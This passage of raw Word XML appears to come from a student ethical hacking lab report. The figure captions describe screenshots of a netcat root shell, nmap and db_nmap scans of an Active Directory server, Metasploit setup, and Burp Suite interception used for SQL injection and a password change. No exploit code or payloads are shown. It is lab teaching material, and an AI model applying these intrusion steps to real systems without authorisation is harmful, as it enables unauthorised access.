        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AC44D1" w14:textId="7FA6201C" w:rsidR="00337A00" w:rsidRDefault="00D00950" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2800FB0F" wp14:editId="20E61753">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>894715</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-589915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3748405" cy="2107565"/>
            <wp:effectExtent l="0" t="0" r="4445" b="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tp-1.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48405" cy="2107565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D8E7EF" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244685C8" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408707D9" w14:textId="6281B3FC" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFA7C15" w14:textId="1D7560A2" w:rsidR="00701604" w:rsidRDefault="00886047" w:rsidP="00701604">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00886047">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00886047">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:13</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00886047">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00701604">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00701604">
        <w:t>Finding the evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1744E088" w14:textId="398BD952" w:rsidR="00337A00" w:rsidRPr="00886047" w:rsidRDefault="00701604" w:rsidP="00886047">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451CF302" wp14:editId="0676C6A2">
            <wp:extent cx="3820801" cy="2191251"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="55" name="Picture 55" descr="C:\Users\ThinkPad\Desktop\ethical\netcat success logged in as a root us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ThinkPad\Desktop\ethical\netcat success logged in as a root user.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26502" cy="2194520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F573D5" w14:textId="35A839E7" w:rsidR="00701604" w:rsidRDefault="00701604" w:rsidP="00701604">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>figure</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :14 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00290BEB">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00290BEB">
        <w:t xml:space="preserve"> success logged in as a root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2869724B" w14:textId="038A1A9E" w:rsidR="00701604" w:rsidRDefault="00701604" w:rsidP="00701604">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="642BE11C" wp14:editId="0267D47B">
            <wp:extent cx="3542339" cy="2117741"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="56" name="Picture 56" descr="C:\Users\ThinkPad\Desktop\ethical\checking root user previleige through who comm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ThinkPad\Desktop\ethical\checking root user previleige through who command.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540051" cy="2116373"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62CEE7" w14:textId="11C21F6C" w:rsidR="00701604" w:rsidRDefault="00701604" w:rsidP="00701604">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 15 </w:t>
      </w:r>
      <w:r w:rsidRPr="00290BEB">
        <w:t>checking root use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>previleige</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> through who command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F15F9" w14:textId="77777777" w:rsidR="00701604" w:rsidRDefault="00701604" w:rsidP="00701604">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C13F4C3" w14:textId="6E4FDB0E" w:rsidR="00827CC6" w:rsidRDefault="00827CC6" w:rsidP="00701604">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7666BA18" wp14:editId="475ED0B4">
            <wp:extent cx="3822357" cy="2147141"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5715"/>
            <wp:docPr id="57" name="Picture 57" descr="win 1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 12-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822103" cy="2146998"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE65C7" w14:textId="20BDEBD0" w:rsidR="00827CC6" w:rsidRDefault="00827CC6" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure: 16</w:t>
      </w:r>
      <w:r w:rsidR="00A458DB">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Reachibility</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KAli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD890E" w14:textId="77777777" w:rsidR="00827CC6" w:rsidRDefault="00827CC6" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDF90F7" w14:textId="7CE02245" w:rsidR="00827CC6" w:rsidRDefault="00827CC6" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B883A82" wp14:editId="477F6205">
            <wp:extent cx="3957320" cy="2220595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8255"/>
            <wp:docPr id="58" name="Picture 58" descr="win 12- 2 N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n 12- 2 Nma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57320" cy="2220595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="039A21D1" w14:textId="34E73431" w:rsidR="00827CC6" w:rsidRDefault="00A458DB" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 17 - </w:t>
      </w:r>
      <w:r w:rsidR="00827CC6">
        <w:t>Scanning AD server from NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426E476" w14:textId="206B9FA0" w:rsidR="00827CC6" w:rsidRDefault="00827CC6" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BD79264" wp14:editId="7817FB4A">
            <wp:extent cx="3575050" cy="2009775"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="60" name="Picture 60" descr="win 12-  5 AD server S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in 12-  5 AD server Scan"/>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575050" cy="2009775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49542A61" w14:textId="020604CF" w:rsidR="00827CC6" w:rsidRDefault="00A458DB" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 18 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00827CC6">
        <w:t>Initilize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00827CC6">
        <w:t xml:space="preserve"> the DB for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00827CC6">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00827CC6">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00827CC6">
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00827CC6">
        <w:t xml:space="preserve"> framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47209DD7" w14:textId="65C8E793" w:rsidR="00827CC6" w:rsidRDefault="00827CC6" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08C875C6" wp14:editId="4EBA8D3B">
            <wp:extent cx="3446145" cy="1934845"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:docPr id="61" name="Picture 61" descr="win 12-  3 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in 12-  3 i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446145" cy="1934845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="779AD72D" w14:textId="6EA057F1" w:rsidR="00827CC6" w:rsidRDefault="00A458DB" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 19 - </w:t>
      </w:r>
      <w:r w:rsidR="00827CC6">
        <w:t>IP address of AD R&amp;D server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6768D5C1" w14:textId="1BE903D4" w:rsidR="00827CC6" w:rsidRDefault="00827CC6" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BBBB659" wp14:editId="354B1172">
            <wp:extent cx="3574415" cy="2010410"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8890"/>
            <wp:docPr id="62" name="Picture 62" descr="win 12-  6 AD server S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in 12-  6 AD server Scan"/>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74415" cy="2010410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DFA5AE" w14:textId="4FCDDE65" w:rsidR="00827CC6" w:rsidRDefault="00A458DB" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 20 - </w:t>
      </w:r>
      <w:r w:rsidR="00827CC6">
        <w:t xml:space="preserve">Scanning AD from DB-NMAP through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00827CC6">
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00827CC6">
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00827CC6">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00827CC6">
        <w:t xml:space="preserve"> –O 10.86.9.40 command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D0447A" w14:textId="4A049D2C" w:rsidR="00827CC6" w:rsidRDefault="00827CC6" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F0C91C" wp14:editId="4AAF77E0">
            <wp:extent cx="4723140" cy="2655597"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="444366112" name="Picture 444366112" descr="win 12-  7 AD aggresive S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in 12-  7 AD aggresive Scan"/>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723295" cy="2655684"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39614790" w14:textId="2FBD13F6" w:rsidR="00827CC6" w:rsidRDefault="00A458DB" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure: 21</w:t>
      </w:r>
      <w:r w:rsidR="001C0224">
        <w:t xml:space="preserve"> with 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038CFBD0" w14:textId="765987CA" w:rsidR="00337A00" w:rsidRDefault="00827CC6" w:rsidP="00827CC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CEB0470" wp14:editId="1F876286">
            <wp:extent cx="3497977" cy="1964826"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="444366113" name="Picture 444366113" descr="win 12-  8 AD aggresive S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 12-  8 AD aggresive Scan"/>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495317" cy="1963332"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A174A06" w14:textId="5DEF69D8" w:rsidR="00827CC6" w:rsidRDefault="00A458DB" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 22 - </w:t>
      </w:r>
      <w:r w:rsidR="00827CC6">
        <w:t xml:space="preserve">Above figure is the output of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00827CC6">
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00827CC6">
        <w:t xml:space="preserve"> –A command which is stands for aggressive report and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00827CC6">
        <w:t>findout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00827CC6">
        <w:t xml:space="preserve"> local domain in details with group user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F95CE" w14:textId="4FC6E011" w:rsidR="00827CC6" w:rsidRDefault="00A458DB" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0978FD3D" wp14:editId="79FBE681">
            <wp:extent cx="3899535" cy="2191385"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="444366114" name="Picture 444366114" descr="win 12-  9 AD S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 12-  9 AD Scan"/>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99535" cy="2191385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA3005" w14:textId="687F7B06" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 23 - This is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scanning R&amp;D _AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B9EF5" w14:textId="62EB4BE6" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="727DF3D8" wp14:editId="32AE471F">
            <wp:extent cx="3672840" cy="2059305"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="444366115" name="Picture 444366115" descr="Burp suit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rp suit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72840" cy="2059305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2356B8" w14:textId="0DFB8CF8" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 24 - Starting burp-suit for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C2B8C5" w14:textId="2181EC80" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B9876CD" wp14:editId="0E3EFD23">
            <wp:extent cx="3785870" cy="2131060"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="444366116" name="Picture 444366116" descr="Burp suit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urp suit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785870" cy="2131060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1359ABDC" w14:textId="11103D51" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure: 25 - Starting burp-suit project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CB9603" w14:textId="3EAA7BBB" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00827CC6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F8A5E09" wp14:editId="4ED43963">
            <wp:extent cx="3801110" cy="2131060"/>
            <wp:effectExtent l="0" t="0" r="8890" b="2540"/>
            <wp:docPr id="444366117" name="Picture 444366117" descr="Burp suite final st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urp suite final stage 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801110" cy="2131060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F628916" w14:textId="4FF4428A" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 26 - This is the browsing status of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cicd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerable site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E69135" w14:textId="23F09771" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="395D8235" wp14:editId="03530B99">
            <wp:extent cx="3396615" cy="1913255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="444366118" name="Picture 444366118" descr="Burp suite cap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Burp suite capture  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396615" cy="1913255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="607146E6" w14:textId="45F72770" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure: 27 - Capture the packet with interception proxy while browsing the site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B9CE60" w14:textId="77777777" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172F3D80" w14:textId="44587EF9" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E6996BE" wp14:editId="329CCC5B">
            <wp:extent cx="3952240" cy="2221865"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="444366119" name="Picture 444366119" descr="burp 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burp suit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952240" cy="2221865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6E15C3" w14:textId="181CF17B" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure: 28 – web proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3645B64D" w14:textId="4B9150EF" w:rsidR="00A458DB" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B6F875C" wp14:editId="2483096A">
            <wp:extent cx="4201706" cy="2364901"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="444366120" name="Picture 444366120" descr="Burp suite change the passwor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Burp suite change the password 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206337" cy="2367507"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
